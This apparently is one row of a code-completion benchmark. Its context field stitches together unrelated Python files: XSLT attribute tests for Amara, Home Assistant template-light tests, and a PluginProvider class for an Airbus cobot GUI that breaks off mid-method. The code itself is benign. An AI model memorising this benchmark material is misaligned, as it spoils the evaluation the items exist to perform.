gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
########################################################################
# test/xslt/test_attribute.py
from amara.writers import WriterError, xmlwriter
from amara.xslt import XsltError
PREFIX_TEMPLATE = xmlwriter.xmlwriter.GENERATED_PREFIX
from xslt_support import _run_xml
SOURCE_XML = """<?xml version="1.0"?><dummy/>"""
def test_attribute_1():
"""`xsl:attribute` as child of literal result element"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="bar"/>""")
def test_attribute_2():
"""`xsl:attribute` as child of literal result element"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="bar"/>""")
def test_attribute_3():
"""`xsl:attribute` with namespace"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo" namespace="http://example.com/spam">bar</xsl:attribute>
<xsl:attribute name="y:foo" namespace="http://example.com/eggs">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:%(prefix0)s="http://example.com/spam" xmlns:y="http://example.com/eggs" %(prefix0)s:foo="bar" y:foo="bar"/>""" % {
'prefix0' : PREFIX_TEMPLATE % 0})
def test_attribute_4():
"""adding attributes with the same expanded-name"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo">bar</xsl:attribute>
<xsl:attribute name="foo">baz</xsl:attribute>
<xsl:attribute name="foo">maz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="maz"/>""")
def test_attribute_5():
"""adding attributes with the same expanded-name"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result foo="bar">
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo">baz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="baz"/>""")
def test_attribute_6():
"""adding attributes with the same expanded-name"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<xsl:attribute name="foo">bar</xsl:attribute>
<!-- duplicate attrs override previous -->
<!-- we use xsl:if to obscure it a bit -->
<xsl:if test="true()">
<xsl:attribute name="foo">baz</xsl:attribute>
</xsl:if>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="baz"/>"""
)
def test_attribute_7():
"""adding attributes with the same expanded-name"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo" namespace="http://some-ns/">bar</xsl:attribute>
<xsl:attribute name="x:foo" xmlns:x="http://some-ns/">baz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:org.4suite.4xslt.ns0="http://some-ns/" org.4suite.4xslt.ns0:foo="baz"/>"""
)
def test_attribute_8():
"""adding attributes with the same expanded-name"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result x:foo="bar" xmlns:x="http://some-ns/">
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo" namespace="http://some-ns/">baz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:x="http://some-ns/" x:foo="baz"/>"""
)
def test_attribute_9():
"""serialization of linefeed in attribute value"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- linefeed must be serialized as -->
<xsl:attribute name="a">x
y</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result a="x y"/>"""
)
def test_attribute_10():
"""substitution of xmlns prefix in attribute name"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- if an attribute prefix would be xmlns, it must be changed to something else -->
<xsl:attribute name="xmlns:foo" namespace="http://example.com/">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:%(prefix0)s="http://example.com/" %(prefix0)s:foo="bar"/>""" % {
'prefix0': PREFIX_TEMPLATE % 0}
)
def test_attribute_11():
"""attributes in various namespaces"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- correct results are indicated in the attribute values -->
<xsl:attribute name="foo">local-name foo, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-empty-ns" namespace="">local-name in-empty-ns, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, generated prefix</xsl:attribute>
<xsl:attribute name="pre:foo" xmlns:pre="http://ns-for-pre/">local-name foo, namespace http://ns-for-pre/, preferred prefix pre</xsl:attribute>
<xsl:attribute name="pre:bar" xmlns:pre="http://ns-for-pre/" namespace="http://explicit-ns/">local-name bar, namespace http://explicit-ns/, generated prefix</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:pre="http://ns-for-pre/" xmlns:%(prefix0)s="http://foo-ns/" xmlns:%(prefix1)s="http://explicit-ns/" %(prefix1)s:bar="local-name bar, namespace http://explicit-ns/, generated prefix" foo="local-name foo, no namespace, no prefix" in-empty-ns="local-name in-empty-ns, no namespace, no prefix" pre:foo="local-name foo, namespace http://ns-for-pre/, preferred prefix pre" %(prefix0)s:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, generated prefix"/>""" % {'prefix0': PREFIX_TEMPLATE % 0,
'prefix1': PREFIX_TEMPLATE % 1}
)
def test_attribute_12():
"""attributes in empty and in-scope default namespaces"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<!-- the element should be in the http://foo-ns/ namespace. -->
<!-- the element *may*, but most likely won't, bear the same generated prefix as the in-foo-ns attribute. -->
<result xmlns="http://foo-ns/">
<!-- A default namespace is in scope, but this does not affect the value of 'name' in xsl:attribute. -->
<!-- in-foo-ns attribute does not inherit the default namespace. It *must* have a prefix, bound to http://foo-ns/ -->
<xsl:attribute name="foo">local-name foo, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-empty-ns" namespace="">local-name in-empty-ns, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, generated prefix</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns="http://foo-ns/" xmlns:%(prefix0)s="http://foo-ns/" foo="local-name foo, no namespace, no prefix" in-empty-ns="local-name in-empty-ns, no namespace, no prefix" %(prefix0)s:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, generated prefix"/>""" % {
'prefix0': PREFIX_TEMPLATE % 0}
)
def test_attribute_13():
"""attributes in empty and in-scope non-default namespaces"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<!-- element should be in http://foo-ns/ namespace, retaining prefix foo -->
<foo:result xmlns:foo="http://foo-ns/">
<xsl:attribute name="foo">local-name foo, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-empty-ns" namespace="">local-name in-empty-ns, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, prefix foo</xsl:attribute>
</foo:result>
</xsl:template>
</xsl:stylesheet>
""",
# it's technically OK for the in-foo-ns attr to have a
# generated prefix, but it really should re-use the foo.
expected = """<?xml version="1.0" encoding="UTF-8"?>
<foo:result xmlns:foo="http://foo-ns/" foo="local-name foo, no namespace, no prefix" in-empty-ns="local-name in-empty-ns, no namespace, no prefix" foo:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, prefix foo"/>"""
)
def test_attribute_14():
"""attributes using in-scope namespaces and duplicate prefixes"""
_run_xml(
source_xml = SOURCE_XML,
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<!-- element should be in http://foo-ns/ namespace, retaining prefix foo -->
<pre:result xmlns:pre="http://foo-ns/">
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, prefix pre</xsl:attribute>
<xsl:attribute name="pre:bar" xmlns:pre="http://ns-for-pre/" namespace="http://explicit-ns/">local-name bar, namespace http://explicit-ns/, generated prefix</xsl:attribute>
</pre:result>
</xsl:template>
</xsl:stylesheet>
""",
# the bar attribute must have a generated prefix.
# it's technically OK for the in-foo-ns attr to have a
# generated prefix, but it really should re-use the pre.
expected = """<?xml version="1.0" encoding="UTF-8"?>
<pre:result xmlns:pre="http://foo-ns/" xmlns:%(prefix0)s="http://explicit-ns/" pre:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, prefix pre" %(prefix0)s:bar="local-name bar, namespace http://explicit-ns/, generated prefix"/>""" % {'prefix0': PREFIX_TEMPLATE % 0}
)
def test_attribute_error_1():
"""adding attribute ater non-attributes"""
try:
_run_xml(
source_xml = """<?xml version="1.0"?><dummy/>""",
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:text>Hello World</xsl:text>
<xsl:attribute name="foo">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = None)
except WriterError, err:
assert err.code == WriterError.ATTRIBUTE_ADDED_TOO_LATE
else:
raise AssertionError("should have failed!")
def test_attribute_error_2():
"""adding attribute to non-element"""
try:
_run_xml(
source_xml = """<?xml version="1.0"?><dummy/>""",
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<xsl:attribute name="foo">bar</xsl:attribute>
</xsl:template>
</xsl:stylesheet>
""",
expected = None)
except WriterError, err:
assert err.code == WriterError.ATTRIBUTE_ADDED_TO_NON_ELEMENT
else:
raise AssertionError("should have failed!")
def test_attribute_error_3():
"""creating non-text during xsl:attribute instantiation"""
try:
_run_xml(
source_xml = """<?xml version="1.0"?><dummy/>""",
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<xsl:attribute name="foo">
<xsl:comment>no-no</xsl:comment>
</xsl:attribute>
</xsl:template>
</xsl:stylesheet>
""",
expected = None)
except XsltError, err:
assert err.code == XsltError.NONTEXT_IN_ATTRIBUTE
else:
raise AssertionError("should have failed!")
def test_attribute_error_4():
"""illegal attribute name ("xmlns")"""
try:
_run_xml(
source_xml = """<?xml version="1.0"?><dummy/>""",
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="xmlns">http://example.com/</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = None)
except XsltError, err:
assert err.code == XsltError.BAD_ATTRIBUTE_NAME
else:
raise AssertionError("should have failed!")
def test_attribute_error_5():
"""illegal attribute name (non-QName)"""
try:
_run_xml(
source_xml = """<?xml version="1.0"?><dummy/>""",
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="#invalid">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = None)
except XsltError, err:
assert err.code == XsltError.INVALID_QNAME_ATTR
else:
raise AssertionError("should have failed!")
def test_attribute_error_6():
"""illegal namespace-uri"""
try:
_run_xml(
source_xml = """<?xml version="1.0"?><dummy/>""",
transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo" namespace="http://www.w3.org/XML/1998/namespace">bar</xsl:attribute>
<xsl:attribute name="spam" namespace="http://www.w3.org/2000/xmlns/">eggs</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
expected = None)
except XsltError, err:
assert err.code == XsltError.INVALID_NS_URIREF_ATTR
else:
raise AssertionError("should have failed!")
if __name__ == '__main__':
raise SystemExit("use nosetests")
| |
"""The tests for the Template light platform."""
import logging
from homeassistant.core import callback
from homeassistant import setup
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.const import STATE_ON, STATE_OFF
from tests.common import (
get_test_home_assistant, assert_setup_component)
from tests.components.light import common
_LOGGER = logging.getLogger(__name__)
class TestTemplateLight:
"""Test the Template light."""
hass = None
calls = None
# pylint: disable=invalid-name
def setup_method(self, method):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.calls = []
@callback
def record_call(service):
"""Track function calls.."""
self.calls.append(service)
self.hass.services.register('test', 'automation', record_call)
def teardown_method(self, method):
"""Stop everything that was started."""
self.hass.stop()
def test_template_state_text(self):
"""Test the state text of a template."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template':
"{{ states.light.test_state.state }}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.set('light.test_state', STATE_ON)
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_ON
state = self.hass.states.set('light.test_state', STATE_OFF)
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_OFF
def test_template_state_boolean_on(self):
"""Test the setting of the state with boolean on."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template': "{{ 1 == 1 }}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_ON
def test_template_state_boolean_off(self):
"""Test the setting of the state with off."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template': "{{ 1 == 2 }}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_OFF
def test_template_syntax_error(self):
"""Test templating syntax error."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template': "{%- if false -%}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_invalid_name_does_not_create(self):
"""Test invalid name."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'bad name here': {
'value_template': "{{ 1== 1}}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_invalid_light_does_not_create(self):
"""Test invalid light."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'switches': {
'test_template_light': 'Invalid'
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_no_lights_does_not_create(self):
"""Test if there are no lights no creation."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template'
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_missing_template_does_create(self):
"""Test missing template."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'light_one': {
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() != []
def test_missing_on_does_not_create(self):
"""Test missing on."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'bad name here': {
'value_template': "{{ 1== 1}}",
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_missing_off_does_not_create(self):
"""Test missing off."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'bad name here': {
'value_template': "{{ 1== 1}}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_on_action(self):
"""Test on action."""
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template': "{{states.light.test_state.state}}",
'turn_on': {
'service': 'test.automation',
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
self.hass.states.set('light.test_state', STATE_OFF)
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_OFF
common.turn_on(self.hass, 'light.test_template_light')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_on_action_optimistic(self):
"""Test on action with optimistic state."""
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'turn_on': {
'service': 'test.automation',
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
self.hass.states.set('light.test_state', STATE_OFF)
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_OFF
common.turn_on(self.hass, 'light.test_template_light')
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert len(self.calls) == 1
assert state.state == STATE_ON
def test_off_action(self):
"""Test off action."""
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template': "{{states.light.test_state.state}}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'test.automation',
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
self.hass.states.set('light.test_state', STATE_ON)
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_ON
common.turn_off(self.hass, 'light.test_template_light')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_off_action_optimistic(self):
"""Test off action with optimistic state."""
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'test.automation',
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_OFF
common.turn_off(self.hass, 'light.test_template_light')
self.hass.block_till_done()
assert len(self.calls) == 1
state = self.hass.states.get('light.test_template_light')
assert state.state == STATE_OFF
def test_level_action_no_template(self):
"""Test setting brightness with optimistic template."""
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template': '{{1 == 1}}',
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'test.automation',
'data_template': {
'entity_id': 'test.test_state',
'brightness': '{{brightness}}'
}
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.attributes.get('brightness') is None
common.turn_on(
self.hass, 'light.test_template_light', **{ATTR_BRIGHTNESS: 124})
self.hass.block_till_done()
assert len(self.calls) == 1
assert self.calls[0].data['brightness'] == '124'
state = self.hass.states.get('light.test_template_light')
_LOGGER.info(str(state.attributes))
assert state is not None
assert state.attributes.get('brightness') == 124
def test_level_template(self):
"""Test the template for the level."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'value_template': "{{ 1 == 1 }}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
},
'level_template':
'{{42}}'
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state is not None
assert state.attributes.get('brightness') == 42
def test_friendly_name(self):
"""Test the accessibility of the friendly_name attribute."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'friendly_name': 'Template light',
'value_template': "{{ 1 == 1 }}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state is not None
assert state.attributes.get('friendly_name') == 'Template light'
def test_icon_template(self):
"""Test icon template."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'friendly_name': 'Template light',
'value_template': "{{ 1 == 1 }}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
},
'icon_template':
"{% if states.light.test_state.state %}"
"mdi:check"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.attributes.get('icon') == ''
state = self.hass.states.set('light.test_state', STATE_ON)
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.attributes['icon'] == 'mdi:check'
def test_entity_picture_template(self):
"""Test entity_picture template."""
with assert_setup_component(1, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'test_template_light': {
'friendly_name': 'Template light',
'value_template': "{{ 1 == 1 }}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
},
'entity_picture_template':
"{% if states.light.test_state.state %}"
"/local/light.png"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.attributes.get('entity_picture') == ''
state = self.hass.states.set('light.test_state', STATE_ON)
self.hass.block_till_done()
state = self.hass.states.get('light.test_template_light')
assert state.attributes['entity_picture'] == '/local/light.png'
| |
#!/usr/bin/env python
#
# Copyright 2015 Airbus
# Copyright 2017 Fraunhofer Institute for Manufacturing Engineering and Automation (IPA)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import uuid
import os
import sys
import __builtin__
import traceback
from xml.etree import ElementTree
from roslib.packages import get_pkg_dir
from python_qt_binding.QtGui import *
from python_qt_binding.QtCore import *
from airbus_pyqt_extend.QtAgiCore import QAgiPackages, get_pkg_dir_from_prefix
from airbus_pyqt_extend.QtAgiGui import QAgiPopup
from airbus_cobot_gui.util import Parameters, CobotGuiException
## @package: plugin_provider
## @version 4.0
## @author Matignon Martin
## @date Last modified 28/02/2014
## @class PluginProvider
## @brief Class for load Python plugin package.
class PluginProvider:
"""
PluginProvider interacts with ros plugin package. The first is its
import plugin, and the second is the set plugin configuration which
it reads.
"""
PLUGIN_SOURCES_LOCATION = 'src'
def __init__(self, parent, xml_register_dir):
"""! The constructor."""
self._context = parent.getContext()
#Check dir
if not os.path.isfile(xml_register_dir):
raise CobotGuiException('Plugin register file "%s" in package "airbus_cobot_gui" not found'
%(xml_register_dir))
#Parse xml file
try:
self._plugin_register = ElementTree.parse(xml_register_dir)
except Exception as e:
raise CobotGuiException(str(e))
def getPkgByName(self, name):
root = self._plugin_register.getroot()
#Find and read node label
plugin_desc = root.find('./plugin[@label="%s"]'%name)
if plugin_desc is None:
raise CobotGuiException('Cannot found package from plugin named "%ss"'%name)
return plugin_desc.attrib['package']
def getInstance(self, plugin_name, plugin_node=None):
"""! Load Python package and provide plugin instance.
@param plugin_name: plugin name.
@type plugin_name: String.
@param plugin_node: plugin xml element tree.
@type plugin_node: Element.
@return plugin_instance: plugin instance.
@type plugin_instance: Plugin.
"""
plugin_pkg_name = None
try:
plugin_pkg_name = self.getPkgByName(plugin_name)
except Exception as ex:
